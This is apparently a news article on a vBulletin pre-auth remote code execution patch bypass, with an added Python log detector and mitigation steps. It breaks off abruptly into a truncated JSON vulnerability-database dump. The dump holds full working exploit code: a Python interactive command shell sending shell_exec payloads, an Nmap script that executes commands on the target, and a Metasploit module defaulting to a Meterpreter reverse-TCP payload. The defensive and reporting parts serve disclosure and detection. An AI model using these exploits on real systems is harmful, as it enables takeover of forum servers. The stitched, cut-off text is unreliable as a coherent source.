A security researcher earlier today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability affecting the widely used internet forum software **vBulletin** that's already under active exploitation in the wild.
vBulletin is a widely used proprietary Internet forum software package, built on PHP and the MySQL database server, that powers over 100,000 websites on the Internet, including the websites and forums of Fortune 500 and Alexa Top 1 million companies.
In September last year, a separate anonymous security researcher publicly disclosed a then-zero-day [RCE vulnerability in vBulletin](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), identified as **CVE-2019-16759** and rated critical with a severity score of 9.8, which allowed attackers to execute malicious commands on the remote server without needing to authenticate to the forum.
A day after the disclosure of CVE-2019-16759, the vBulletin team released [security patches](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch>) that were meant to resolve the issue, but it turns out that the patch was insufficient to block exploitation of the flaw.
## Bypassing the Patch for the CVE-2019-16759 RCE Flaw
The newly released zero-day, discovered and [publicly published](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>) by security researcher Amir Etemadieh (Zenofex), is a bypass of the patch for CVE-2019-16759. The flaw had not received a CVE identifier at the time this article was published.
The latest zero-day [vulnerability](<https://twitter.com/h4x0r_dz/status/1292759555034828800>) should be viewed as a severe issue because it is remotely exploitable and doesn't require authentication. It can be exploited with a single one-line command that results in remote code execution on the latest vBulletin software.
According to the researcher, the patch for CVE-2019-16759 did not address the issues in the "widget_tabbedcontainer_tab_panel" template: it can still load a user-controlled child template, and to load that child template it takes a value from a separately named parameter and places it into a variable named "widgetConfig", which is exactly what allowed the researcher to bypass the patch for CVE-2019-16759.
The researcher also published three proof-of-concept exploit payloads, written in Bash, Python, and Ruby.
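As an added example (not code from the article, the researcher, or vBulletin), the following Python detector flags access-log entries and captured request bodies that have the shape of the original CVE-2019-16759 request (widgetConfig[code] sent to the widget_php renderer) and of this bypass (a subWidgets child template of widget_php sent to the widget_tabbedcontainer_tab_panel renderer). It assumes combined-format access logs and that a reverse proxy or WAF stored the POST body alongside each line; all sample log lines and bodies are constructed, with the PHP payload replaced by a placeholder.

```python
"""Flag web requests shaped like the vBulletin widget_php / widgetConfig RCE
(CVE-2019-16759) and the widget_tabbedcontainer_tab_panel patch bypass.

Assumptions (this is an added example, not vBulletin's or the article's code):
  - access logs are in Apache/nginx combined format;
  - a reverse proxy or WAF stored the POST body alongside the log line;
  - all sample log lines and bodies below are constructed, with the PHP
    payload replaced by the placeholder PAYLOAD_REDACTED.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Templates the two request shapes render, reached via the path or the routestring parameter.
RENDER_TEMPLATES = ("widget_tabbedcontainer_tab_panel", "widget_php")
# subWidgets[N][template] is how the tab panel is told which child template to load.
SUBWIDGET_TEMPLATE_RE = re.compile(r"^subWidgets\[\d+\]\[template\]$")
# widgetConfig[code] is the parameter abused by the original CVE-2019-16759 requests.
WIDGETCONFIG_CODE = "widgetConfig[code]"


def rendered_templates(path, routestrings):
    """Return the watched template names that this request asks vBulletin to render."""
    found = set()
    for route in [path, *routestrings]:
        for tmpl in RENDER_TEMPLATES:
            if f"ajax/render/{tmpl}" in route:
                found.add(tmpl)
    return found


def classify_params(params):
    """Reasons the merged query/body parameters look like either request shape."""
    reasons = []
    if WIDGETCONFIG_CODE in params:
        reasons.append("widgetConfig[code] supplied (CVE-2019-16759 shape)")
    for key, values in params.items():
        if SUBWIDGET_TEMPLATE_RE.match(key) and "widget_php" in values:
            reasons.append(f"{key}=widget_php child template (patch-bypass shape)")
    return reasons


def analyze_request(log_line, body=""):
    """Combine one access-log line with its captured body and decide whether to alert."""
    m = LOG_RE.match(log_line)
    if not m:
        return {"matched": False, "reasons": ["unparsable log line"], "templates": []}
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query)  # keys and values are percent-decoded here
    for key, values in parse_qs(body).items():
        params.setdefault(key, []).extend(values)
    templates = rendered_templates(unquote(parts.path), params.get("routestring", []))
    reasons = classify_params(params)
    # The render endpoints are also hit by ordinary page loads, so the alert
    # keys on the parameters; the template list is reported as supporting context.
    return {
        "matched": bool(reasons),
        "ip": m.group("ip"),
        "time": m.group("time"),
        "status": m.group("status"),
        "templates": sorted(templates),
        "reasons": reasons,
    }


def scan(log_lines, bodies):
    """Run analyze_request over a log; bodies maps line index -> captured POST body."""
    hits = []
    for i, line in enumerate(log_lines):
        result = analyze_request(line, bodies.get(i, ""))
        if result["matched"]:
            hits.append(result)
    return hits


# Constructed sample data: one benign view, one bypass-shaped POST, one original-shape POST.
SAMPLE_LOGS = [
    '203.0.113.10 - - [11/Aug/2020:14:02:11 +0000] "GET /forum/general HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Aug/2020:14:05:43 +0000] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 312 "-" "curl/7.68.0"',
    '198.51.100.9 - - [11/Aug/2020:14:06:02 +0000] "POST /index.php?routestring=ajax/render/widget_php HTTP/1.1" 200 88 "-" "python-requests/2.24"',
]
SAMPLE_BODIES = {
    1: "subWidgets%5B0%5D%5Btemplate%5D=widget_php&subWidgets%5B0%5D%5Bconfig%5D%5Bcode%5D=PAYLOAD_REDACTED",
    2: "widgetConfig%5Bcode%5D=PAYLOAD_REDACTED",
}

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS, SAMPLE_BODIES):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} "
              f"templates={hit['templates']} reasons={hit['reasons']}")
```

Access logs alone do not contain POST bodies, so without a proxy or WAF capturing them the detector can only report which render template a request targeted, which is useful context but not an alert on its own.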
## Hackers Actively Exploiting vBulletin Zero-Day
Soon after the release of the PoC exploit code, hackers started exploiting the zero-day to [target vBulletin sites](<https://gist.github.com/Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b>).
According to Jeff Moss, creator of the DefCon and Black Hat security conferences, the DefCon forum was also attacked with the exploit just three hours after the flaw was disclosed.
"A new VBulletin Zero Day got dropped yesterday by @Zenofex that revealed the CVE-2019-16759 patch was incomplete - within three hours https://forum.defcon.org was attacked, but we were ready for it. Disable PHP rendering to protect yourself until patched!" said [Moss](<https://twitter.com/thedarktangent/status/1292813958332596224>).
## Official vBulletin Patch and Mitigations
The vBulletin team responded to the publicly released zero-day flaw immediately and released a new security patch that disables the PHP module in vBulletin to address the issue, assuring users that the module will be removed entirely in the upcoming vBulletin 5.6.4 release.
The forum maintainers advised developers to consider all older versions of vBulletin vulnerable and upgrade their sites to run vBulletin 5.6.2 as soon as possible. Developers can check Quick Overview: [Upgrading vBulletin Connect](<https://forum.vbulletin.com/node/4391346/>) in the support forums for more information on upgrading.
Though The Hacker News strongly advises users and developers to upgrade their forums to the new vBulletin version, those who cannot update immediately can mitigate the new zero-day by disabling PHP widgets within their forums. To do this:
* Go to the vBulletin administrator control panel and click "Settings" in the menu on the left, then "Options" in the dropdown.
* Choose "General Settings" and then click "Edit Settings."
* Look for "Disable PHP, Static HTML, and Ad Module rendering" and set it to "Yes."
* Click "Save."
Note that these changes could break some functionality, but they will mitigate the issue until you can apply the official security patches.
"https://packetstormsecurity.com/files/download/154648/vbulletin_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T01:26:42", "description": "", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T00:00:00", "id": "PACKETSTORM:158830", "href": "https://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# vBulletin 5.x pre-auth widget_tabbedContainer RCE exploit by @zenofex \n \nimport argparse \nimport requests \nimport sys \n \ndef run_exploit(vb_loc, shell_cmd): \npost_data = {'subWidgets[0][template]' : 'widget_php', \n'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd \n} \nr = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) \nreturn r.text \n \nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') \nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') \nARGS = ap.parse_args() \n \nwhile True: \ntry: \ncmd = input(\"vBulletin5$ \") \nprint(run_exploit(ARGS.location, cmd)) \nexcept KeyboardInterrupt: \nsys.exit(\"\\nClosing shell...\") \nexcept Exception as e: \nsys.exit(str(e)) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158830/vbulletin50-exec.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-26T23:36:58", "description": "", "cvss3": {}, "published": "2019-09-26T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x 0-Day Pre-Auth Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T00:00:00", "id": "PACKETSTORM:154623", "href": 
"https://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html", "sourceData": "`description = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]] \n \nlocal http = require \"http\" \nlocal shortport = require \"shortport\" \nlocal vulns = require \"vulns\" \nlocal stdnse = require \"stdnse\" \nlocal string = require \"string\" \n \n--- \n-- @usage \n-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target> \n-- \n-- @output \n-- PORT STATE SERVICE \n-- s4430/tcp open http \n-- | http-vuln-CVE-2019-16759: \n-- | VULNERABLE \n-- | vBulletin 5.x 0day pre-auth RCE exploit \n-- | State: VULNERABLE \n-- | IDs: CVE:CVE-2019-16759 \n-- | \n-- | Disclosure date: 2019-09-23 \n-- | References: \n-- | https://seclists.org/fulldisclosure/2019/Sep/31 \n-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759 \n-- \n-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is \"/\". 
\n \nauthor = \"r00tpgp\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = { \"vuln\" } \n \nportrule = shortport.http \n \naction = function(host, port) \nlocal vuln = { \ntitle = \"vBulletin 5.x 0day pre-auth RCE exploit\", \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]], \nIDS = { \nCVE = \"CVE-2019-16759\" \n}, \nreferences = { \n'https://seclists.org/fulldisclosure/2019/Sep/31', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-16759', \n}, \ndates = { \ndisclosure = { year = '2019', month = '09', day = '23' } \n} \n} \n \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \n \nlocal method = stdnse.get_script_args(SCRIPT_NAME..\".method\") or \"POST\" \nlocal path = stdnse.get_script_args(SCRIPT_NAME..\".path\") or \"/index.php?routestring=ajax/render/widget_php\" \n \nlocal body = { \n[\"widgetConfig[code]\"] = \"echo shell_exec(\\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\\');exit;\", \n} \n \nlocal options = { \nheader = { \nConnection = \"close\", \n[\"Content-Type\"] = \"application/x-www-form-urlencoded\", \n[\"User-Agent\"] = \"curl/7.65.3\", \n[\"Accept\"] = \"*/*\", \n}, \ncontent = body \n} \nlocal response = http.post(host, port, path, nil, nil, body) \n \nif response and string.match(response.body, \"h4x0000r\") then \nvuln.state = vulns.STATE.VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154623/http-vuln-CVE-2019-16759.nse.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-14T01:07:31", "description": "", "cvss3": {}, "published": "2020-08-13T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-13T00:00:00", "id": 
"PACKETSTORM:158866", "href": "https://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \nHttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] } \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.', \n'Description' => %q{ \nThis module exploits a logic bug within the template rendering code in vBulletin 5.x. \nThe module uses the vBulletin template rendering functionality to render the \n'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. \nThis causes the former template to load the latter bypassing filters originally put in place \nto address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input \nallowing the module to achieve PHP remote code execution on the target. This module has been \ntested successfully on vBulletin version 5.6.2 on Ubuntu Linux. 
\n}, \n'Author' => [ \n'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module \n], \n'References' => [ \n['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'], \n['CVE', '2020-7373'] \n], \n'DisclosureDate' => '2020-08-09', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'windows'], \n'Arch' => [ARCH_CMD, ARCH_PHP], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Meterpreter (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => [ARCH_PHP], \n'Type' => :php_memory, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => false \n} \n], \n[ \n'Unix (CMD In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => true \n} \n], \n[ \n'Windows (CMD In-Memory)', \n'Platform' => 'windows', \n'Arch' => ARCH_CMD, \n'Type' => :windows_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'DisablePayloadHandler' => true \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']), \nOptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']]) \n]) \n \nend \n \ndef cmd_payload(command) \n\"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\" \nend \n \ndef execute_command(command) \nresponse = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'), \n'encode_params' => true, \n'vars_post' => { \n'subWidgets[0][template]' => 'widget_php', \n'subWidgets[0][config][code]' => command \n} \n}) \nif response && response.body \nreturn response \nend \n \nfalse 
\nend \n \ndef check \nrand_str = Rex::Text.rand_text_alpha(8) \nreceived = execute_command(cmd_payload(\"echo #{rand_str}\")) \nif received && received.body.include?(rand_str) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \ncase target['Type'] \nwhen :unix_cmd, :windows_cmd \ncmd = cmd_payload(payload.encoded) \nvprint_status(\"Generated command payload: #{cmd}\") \n \nreceived = execute_command(cmd) \nif received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\") \nprint_warning('Dumping command output in body response') \nif received.body.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(received.body.to_s) \nend \n \nwhen :php_memory \nvprint_status(\"Generated command payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158866/vbulletin_widget_template_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:33:26", "description": "## CVE-2019-16759 \n\nvBull...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-24T16:15:10", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-26T06:48:16", "id": "AD9CC4D7-BA6E-59EF-9EFB-25F48D026054", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:21", "description": "# [CVE-2019-16759]vBulletin_Routestring-RCE-PoC\nA vulnerability ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-31T13:44:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-11-07T20:15:29", "id": "E827264A-33DB-5591-9107-3B2C883318B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:24:06", "description": "SUMMARY\n-------\nSimple NSE script to 
detect vBulletin 5.x 0day p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-26T03:27:17", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-09-17T11:03:18", "id": "D3A62E89-01F9-5BF8-AB5C-D80CDF936E3C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:22:21", "description": "# CVE-2019-16759 (vBulletin 5.0 < 5.5.4 - 'widg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-12T18:51:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-03-14T10:23:15", "id": "AA667A5B-9A75-56CD-9856-E0E33AF472EE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T07:41:35", "description": "# CVE-2019-16759 vBulletin 5.x \u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\n\n vBulletin 5.0.0 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-29T18:49:15", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-07-30T18:14:45", "id": 
"E4B3128C-2985-55D6-AC83-E0946C875D2D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-02T12:01:58", "description": "# vbulletin5 rce\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\n\n\n\n# 0x00 \u6982\u8ff0\n\n201909 vbulletion5(5.0.0-5....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-02T16:46:43", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-07-02T07:15:43", "id": "5EE05991-6442-518F-9E3D-D23E4DFD6F1C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-15T21:28:06", "description": "# vBulletin RCE 5.x Get Email + SMTP\n\n# CVE-2019-16759\nThis tool...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-16T18:17:33", "type": "githubexploit", "title": "Exploit for Code Injection in Vbulletin", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-06-15T19:58:02", "id": "466BD20E-73F1-585B-8C2D-1B77366E07FB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "canvas": [{"lastseen": "2021-07-28T14:33:31", "description": "**Name**| vbulletin_widget_rce \n---|--- \n**CVE**| CVE-2019-16759 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| RCE via widgetConfig[code] paramater in vBulletin \n**Notes**| CVE Name: CVE-2019-16759 \nVENDOR: vBulletin \nNOTES: \nAn unauthenticated code execution bug can be exploited on the vBulletin core for the following versions: \n \n* 5.x.x <= 5.5.4 (Tested on Ubuntu 18.10) \n \nRepeatability: Infinite \nReferences: https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-16759 \nDate public: 23/09/2019 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
